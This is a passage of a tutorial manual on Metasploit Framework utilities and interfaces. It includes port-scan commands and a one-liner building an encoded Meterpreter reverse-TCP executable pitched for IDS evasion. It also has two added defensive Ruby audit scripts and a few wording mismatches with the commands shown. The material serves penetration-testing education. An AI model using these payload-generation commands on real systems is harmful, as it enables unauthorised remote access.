Backtrack Manual Part6


Page 1: Backtrack Manual Part6

Project Report

on

Project by - Nutan Kumar Panda

Technology Evangelist ISEH

R&D - ATL Guwahati

Project By: Nutan Kumar Panda


Metasploit

The MSF is an open-source tool which provides a framework for security researchers to develop exploits, payloads, payload encoders, and tools for reconnaissance and other security testing purposes. Although it initially started off as a collection of exploits and provided the ability for large chunks of code to be re-used across different exploits, in its current form it provides extensive capabilities for the design and development of reconnaissance, exploitation, and post-exploitation security tools.

Exploitation

Exploitation involves code that performs a number of key functions, such as:

1. Connecting to the remote system on the vulnerable port.

2. Exchanging initial protocol sequence until the vulnerable fault injection point is reached.

3. Injecting exploit code, which includes instructions for the return address to be modified to point directly or indirectly into our payload, as well as NOP instructions, which increase the chances that our code will eventually be executed.

4. Post-exploitation fun, which could be either connecting to a command prompt bound to a listening port on the compromised system, or connecting to the remote system with the username and password of a user that has been created as part of the exploit process, or it could mean connecting with a GUI client to a remote GUI (such as VNC).

Understanding Metasploit Channels

The latest version of Metasploit now provides the user with multiple channels to interface with it. These allow a very high degree of flexibility for different requirements or situations, such as:

- A single user exploiting a single target.
- A single user exploiting multiple targets during one session, either in interactive or in batch mode.
- Opening multiple payload sessions at once.
- Suspending and restoring payload sessions.
- Sharing payload sessions with other users.
- A group of penetration testers collaborating on testing the same network or different networks.
- A penetration tester remotely logging in to the pre-configured Metasploit system, and launching exploits from there.


The channels available with Metasploit v3.x are listed below:

The Directory Structure of the Framework

Updating Metasploit

The Framework can be updated using a standard Subversion client. The old msfupdate tool is no longer supported. Windows users can click on the Online Update link within the Metasploit 3 program folder on the Start Menu. To obtain the latest updates on a Unix-like platform, change into the Framework installation directory and execute svn update. If you are accessing the internet through an HTTP proxy server, please see the Subversion FAQ on proxy access:

http://subversion.tigris.org/faq.html#proxy

One of the primary values of Metasploit is that it is constantly being updated to provide exploits for the newest and most interesting vulnerabilities. As time goes on and patches are applied, a given exploit becomes less and less likely to work, so using the latest exploits is usually a very good idea. By routinely updating Metasploit (e.g. before every use), you give yourself the best chance of exploiting your targets successfully. Older versions of Metasploit used a custom utility called msfupdate to grab the latest code, but as of Metasploit 3.0, msfupdate has been replaced by Subversion (http://subversion.tigris.org). Once you’ve downloaded Metasploit, you now keep it up to date simply by using your Subversion client of choice to “update” the Metasploit directory. For example, I update my Metasploit using the Unix command-line Subversion client called svn, which looks something like this:

svn update

At revision 4532.

This isn’t a particularly exciting example because my Metasploit was already up to date, but then again, that’s a good thing. If your Metasploit was in need of updating, you would see a list of file modifications and deletions more like this:


svn update

UU modules/nops/ppc/simple.rb

UU modules/nops/x86/opty2.rb

UU modules/nops/x86/single_byte.rb

UU modules/nops/nop_test.rb.ut.rb

A modules/nops/php

A modules/nops/php/generic.rb

UU modules/nops/sparc/random.rb

…………

………..

Updated to version 4532

Msfopcode

The Metasploit project team has done a marvelous job in creating an opcode database that now consists of over 14 million opcodes. Earlier, this database was accessible only over the Web on the Metasploit Web site. With version 3.0 of the framework, this data can now be accessed via the msfopcode interface, which connects back to the Metasploit Web server to retrieve the actual information. The options available with msfopcode are displayed when executing this utility with the -h switch. This interface is merely a front end to the Rex::Exploitation::OpcodeDb::Client class, which talks to an HTTP-based XML protocol running on the Metasploit.com Web server.

./msfopcode

Usage: msfopcode command

SUPPORTED COMMANDS

stats Display database statistics

locales Display supported locales

metatypes Display Supported opcode meta types (Ex: imp reg)

groups Display supported opcode groups (Ex:esp=>eip)


types Display supported opcode type (Ex: imp esp)

platforms Display supported platforms

modules Display information about specific modules

search Search for opcode given a set of criteria

The purpose of the stats command is to show the current database statistics, such as the number of opcodes and modules currently indexed by the database and the last time the database was updated. The output to this command looks something like this:

./msfopcode stats

Last Updated : Sat Sep 03 01:32:00 CDT 2005

Number of Opcodes : 12177419

Number of Opcode Types : 320

Number of Platforms : 14

Number of Architectures : 1

Number of Modules : 17683

Number of Module Segments: 71457

Number of Module Imports : 2065492

Number of Module Exports : 927637

Msfrpc/ Msfrpcd

The msfrpcd daemon uses the xmlrpc plugin to provide a remote interface to the Metasploit Framework. By default, this service listens on port 55553, uses SSL, and is password protected. The RPC interface allows access to a minimal set of framework APIs, covering the core framework, the module set, the job list, and the session table. These APIs can be used to enumerate modules, execute them, and interact with the resulting sessions and jobs.

[ USAGE ]

To activate the RPC interface, launch msfrpcd, or load msfconsole and load the xmlrpc plugin.


./msfrpcd -P s3cr3tp4ss

- or -

msf> load xmlrpc Pass=password

Once the interface is started, any compatible RPC client can be used to interact with the service. The 'msfrpc' client provides a Ruby shell that can be used to talk to the service.

./msfrpc -h server_name -P s3cr3tp4ss

[*] The 'rpc' object holds the RPC client interface

>> rpc.call("core.version")

=> {"version"=>"3.3-dev"}

Msfd

The msfd utility opens a network interface to the msfconsole. It is executed by specifying the IP address and the port on which it should listen for incoming connections. This allows a single user or multiple users to connect from a remote system to the framework. For instance, the following command will execute the msfd utility as a daemon listening on IP address 192.168.137.128 and port 55554:

msfd -a 192.168.137.128 -d -p 55554

Msfelfscan/ Msfpescan/ Msfmachscan

Msfelfscan is used to locate interesting addresses within Executable and Linkable Format (ELF) programs, which may prove useful in developing exploits. Msfpescan does the same thing for Windows (PE) binaries, and msfmachscan for Mach-O binaries.

Auxiliary Modules

Auxiliary modules are essentially used to cover the first stage of a penetration test: fingerprinting and vulnerability scanning. The Auxiliary module system includes the Scanner mixin, which makes it possible to write scanning modules that target one host or a range of user-specified hosts. Auxiliary modules can also import any Exploit module mixin and leverage the protocol-specific application programming interfaces (APIs) for the Distributed Computing Environment Remote Procedure Call (DCERPC), HTTP, Server Message Block (SMB) and Sun Remote Procedure Call (RPC) protocols. Any exploitation code that does not use a payload would be part of the auxiliary module system. This currently includes dos/windows/smb/ms06_035_mailslot (exploits the MS06-035 kernel pool memory corruption bug in SRV.SYS) and dos/windows/smb/rras_vls_null_deref (triggers a NULL dereference in svchost.exe on all current versions of Windows that run the Routing and Remote Access Service [RRAS]).

List all auxiliary modules

Metasploit 3.0 supports auxiliary modules, which can be used to perform arbitrary, one-off actions such as port scanning, denial of service, and even fuzzing.

Now use the appropriate auxiliary module as per your requirement:

msf > use scanner/portscan/tcp

msf > show options

msf > set rhosts 192.168.1.100 (a single host, or a range such as 192.168.1.1/24)

msf > set ports 1-1024

msf > run


TCP portscan Result

Msfgui

The msfgui interface was introduced in version 3.1 and provides the functionality of msfconsole in addition to many new features. To access a msfconsole shell, select the Console option from the Window menu. To search for a module within the module tree, enter a string or regular expression into the search box and click the button labeled Find. All matching modules will appear in the tree below. To execute a module, double-click its name in the tree, or right-click its name and select the Execute option. To view the source code of any module, right-click its name and select the View Code option.

This new GUI is multi-platform and is based on Java; the Netbeans project for it can be found in the external/source/gui/msfguijava/ directory for those who want to contribute and have Ninja Skills with Java and user interfaces. The GUI can be run by invoking the msfgui script at the base of the Metasploit directory:

./msfgui

The Metasploit Graphical User Interface


Msfcli

The msfcli interface allows exploits to be executed from the UNIX or Windows command line without the need to first launch the msfconsole interface. This is best suited for quickly launching an exploit by directly specifying the required parameters as command-line arguments. It is also particularly useful when a large number of systems need to be tested for the same vulnerability: a simple shell script can be written which cycles through a range of IP addresses and uses msfcli to run exploits against each of the targeted systems. Using the -h switch gives us the options available with this interface. A straightforward example that demonstrates the easiest way to run an exploit using the msfcli interface would be:

1. Display information about a selected exploit:

./msfcli <exploit_name> S

2. Show available payloads:

./msfcli <exploit_name> P

3. Choose the payload to use with this exploit, and display the options that need to be set:

./msfcli <exploit_name> PAYLOAD=<payload_name> O

4. List available targets:

./msfcli <exploit_name> PAYLOAD=<payload_name> T

5. Set the required options in option=value form and execute with the E mode.

Exploiting Windows Box with Msfcli

Msfweb

The msfweb interface is based on Ruby on Rails. To access this interface, execute msfweb to start up the server. The msfweb interface uses the WEBrick web server to handle requests. By default, msfweb will listen on the loopback address (127.0.0.1) on port 55555. A log message should be displayed indicating that the service has started. To access the interface, open your browser to the appropriate URL (http://127.0.0.1:55555/ by default).

The main msfweb interface consists of a toolbar containing various icons and a background with the Metasploit logo. If you want access to a console, click the Console link. This console interface is nearly identical to the standard msfconsole interface. The Exploits, Auxiliary, and Payloads links will walk you through the process of selecting a module, configuring it, and running it. Once an exploit is run and a session is created, you can access these sessions from the Sessions link. These icons will open up a sub-window within the page. These windows can be moved, minimized, maximized, and closed.


The msfweb interface is the only GUI currently available to the MSF. It offers no security whatsoever, but is currently the recommended way to use the framework on Windows. This interface can be launched with a number of options, which are available with the -h switch, as shown in the following example:

./msfweb -h

Usage: msfweb <options>

OPTIONS:

-a <opt> Bind to this IP address instead of loopback

-d Daemonize the web server

-h Help banner

-p <opt> Bind to this port instead of 55555

-v <opt> A number between 0 and 3 that controls log verbosity

For instance, the following command would launch the Web interface on IP address 192.168.1.10 on the default port 55555 and send it into daemon mode. We can connect to it through any supported browser (Mozilla Firefox, Microsoft Internet Explorer, or Safari).

./msfweb -a 192.168.1.10 -d

Now, in any browser, open the URL:

http://192.168.1.10:55555
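Because msfweb offers no security of its own, and msfd and msfrpcd likewise accept connections on whatever address they are bound to, it is worth checking which of these management ports are reachable from the network before leaving a Metasploit host running. The following Ruby script is an added example, not part of this manual or of the framework: it parses the text printed by `ss -ltn` (or `netstat -ltn`) and flags the default ports from this manual (55553 msfrpcd, 55554 msfd, 55555 msfweb) whenever they are bound to anything other than a loopback address. The listing embedded below is a constructed sample.

```ruby
# Added example, not part of the manual: audit which Metasploit management
# services are reachable from the network. Default ports per the manual:
# msfrpcd 55553 (password-protected RPC), msfd 55554 (msfconsole over the
# network), msfweb 55555 (which "offers no security whatsoever"). Any bind
# other than loopback exposes them. Input is `ss -ltn` / `netstat -ltn` text.

MSF_PORTS = {
  55553 => "msfrpcd",
  55554 => "msfd",
  55555 => "msfweb",
}.freeze

# Loopback binds in the forms ss/netstat print them.
LOOPBACK = /\A(127\.\d{1,3}\.\d{1,3}\.\d{1,3}|::1|\[::1\])\z/

# Turn one listener line, e.g. "LISTEN 0 128 192.168.1.10:55554 0.0.0.0:*",
# into [address, port]; the header line and non-LISTEN lines yield nil.
def parse_listener(line)
  fields = line.split
  return nil unless fields[0] == "LISTEN" && fields[3]
  m = fields[3].match(/\A(.+):(\d+)\z/)
  m && [m[1], m[2].to_i]
end

# Findings for every Metasploit port bound to something other than loopback.
# "0.0.0.0", "*" and "[::]" are wildcard binds and therefore count as exposed.
def exposed_msf_services(listing)
  listing.each_line.each_with_object([]) do |line, found|
    addr, port = parse_listener(line)
    next unless port && MSF_PORTS.key?(port)
    next if addr.match?(LOOPBACK)
    found << { port: port, addr: addr, service: MSF_PORTS[port] }
  end
end

# Constructed sample: msfweb on loopback (fine), msfd on a LAN address and
# msfrpcd on the wildcard address (both exposed), plus an unrelated sshd.
SAMPLE_LISTING = <<~SS
  State  Recv-Q Send-Q Local Address:Port   Peer Address:Port
  LISTEN 0      128    127.0.0.1:55555      0.0.0.0:*
  LISTEN 0      128    192.168.1.10:55554   0.0.0.0:*
  LISTEN 0      128    *:55553              *:*
  LISTEN 0      128    0.0.0.0:22           0.0.0.0:*
SS

if __FILE__ == $PROGRAM_NAME
  exposed_msf_services(SAMPLE_LISTING).each do |f|
    puts "EXPOSED: #{f[:service]} listening on #{f[:addr]}:#{f[:port]}"
  end
end
```

On a real host, pipe the live listing in (`ss -ltn | ruby msf_exposure.rb` with the constant replaced by `$stdin.read`) and treat every finding as a service that must either be moved to loopback or reached only over SSH port-forwarding.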


Msfencode

The msfencode utility provides direct access to the payload encoders provided with the framework. These can be listed using the -l option. Other options that can be used are available using the -h switch.

A simple usage for this would be to use the msfpayload utility to generate the payload in raw format, and either pipe the output directly to msfencode or read it from a file. Encoding ensures that bad characters do not occur in the payload, which also ends up improving the IDS evasion probability. Let’s say we want to encode the payload, but limit ourselves to alphanumeric output. We would also like to avoid the NULL (0x00) byte occurring in the output. This can be done with the msfencode command. As can be seen, the size of the output has increased due to the encoding: it was 116 bytes after running the msfpayload command, where we redirected the raw output to the file in_exec_raw, but when this file is given as input to the encoder, it is 296 bytes.

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R | ./msfencode -c 5 -t exe > /tmp/meterpreter_reverse_tcp.exe
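The two properties the paragraph above asks of the encoder, no NULL byte and alphanumeric-only output, are easy to verify before the encoded payload is used, and the size growth it mentions can be measured at the same time. The Ruby below is an added example, not part of this manual or of msfencode: it checks a byte string against a bad-character list, tests whether it is purely alphanumeric, and reports the growth from raw to encoded. The raw and encoded byte strings it uses are constructed stand-ins, not real msfpayload/msfencode output.

```ruby
# Added example, not part of the manual: verify that an encoder's output meets
# the constraints the msfencode passage describes (no NULL byte, optionally
# alphanumeric-only) and measure how much the encoding grew the payload.
# RAW_SAMPLE and ENCODED_SAMPLE are constructed, not real msfencode output.

ALNUM_BYTES = (("A".."Z").to_a + ("a".."z").to_a + ("0".."9").to_a).map(&:ord).freeze

# Offsets of every byte of `payload` that is listed in `badchars`
# (both are binary strings, e.g. "\x00\x0a\x0d").
def bad_char_offsets(payload, badchars = "\x00".b)
  bad = badchars.bytes
  payload.bytes.each_with_index.select { |b, _| bad.include?(b) }.map { |_, i| i }
end

# True when every byte is [A-Za-z0-9], the property an alphanumeric encoder promises.
def alphanumeric?(payload)
  payload.bytes.all? { |b| ALNUM_BYTES.include?(b) }
end

# Compare raw and encoded payloads: sizes, growth, leftover bad bytes, alnum check.
def check_encoding(raw, encoded, badchars: "\x00".b)
  {
    raw_size: raw.bytesize,
    encoded_size: encoded.bytesize,
    growth: encoded.bytesize - raw.bytesize,
    bad_offsets: bad_char_offsets(encoded, badchars),
    alphanumeric: alphanumeric?(encoded),
  }
end

# Constructed sample: a "raw" blob that contains a NULL at offset 3, and an
# "encoded" blob that is purely alphanumeric and larger, as the manual describes.
RAW_SAMPLE = "\x31\xc0\x50\x00\x68".b
ENCODED_SAMPLE = "PYIIIIIIIIIIQZ".b

if __FILE__ == $PROGRAM_NAME
  p bad_char_offsets(RAW_SAMPLE)                # [3]
  p check_encoding(RAW_SAMPLE, ENCODED_SAMPLE)  # growth 9, no bad bytes, alphanumeric true
end
```

To check real output, read the raw and encoded files with `File.binread` in place of the two constants; a non-empty `bad_offsets` list means the chosen encoder or its bad-character list needs another look.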


Generating encoded executable meterpreter reverse Payload

Msfpayload

The msfpayload utility enables the user to modify existing payloads depending on parameters supplied on the command line, and obtain the output in C, Perl, Ruby or Raw form. The following example illustrates the use of msfpayload. The msfpayload -h command lists the options that can be used along with all the available payloads. We now need to select a payload. The S option shows us information about a specific payload.

After selecting a particular payload to play around with, we can then have msfpayload modify values within the payload and produce output with the C option for including the payload as part of a C program, or with the P option for using it in Perl scripts. It could also be output in Raw format, which allows it to be piped to another program, such as msfencode, or redirected to a file. As can be seen from the output shown above, we need to set the CMD parameter in order for a payload to be created which would execute that particular command upon successful exploitation. We will set it to a very straightforward dir command, and obtain the output for including it in a Ruby script, as shown below:


./msfpayload windows/exec CMD=calc.exe P

Msfconsole

The msfconsole is the traditional and primary means of using the MSF. After installation, the console can simply be launched by typing the command ./msfconsole (for UNIX) or msfconsole (for Windows) from within the path where it has been installed. The prompt that appears, as shown in Figure 1.5, displays the graphical Metasploit logo, the version of the framework, and the number of exploits, payloads, encoders, NOPs and auxiliary modules available. Immediately after launching the console, the intuitive command to type is help, and its output is shown below.

Launching the MSF console


Output of the help or ? Command
